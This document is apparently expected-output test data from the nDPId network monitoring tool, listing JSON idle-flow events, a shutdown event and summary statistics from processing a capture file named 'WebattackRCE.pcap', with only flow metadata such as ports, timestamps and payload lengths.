00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7580000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7580000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7580000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7580000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":797,"packets-processed":797,"total-skipped-flows":0,"total-l4-payload-len":138401,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":797,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":797,"total-idle-flows":797,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3191,"global_ts_msec":1576420278014}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 797/797
~~ skipped flows.............: 0
~~ total layer4 data length..: 138401 bytes
~~ total detected protocols..: 797
~~ total active/idle flows...: 797/797
~~ total timeout flows.......: 0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ total memory allocated....: 6999549 bytes
~~ total memory freed........: 6999549 bytes
~~ total allocations/frees...: 128794/128794
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 468 chars
~~ json string max len.......: 1400 chars
~~ json string avg len.......: 934 chars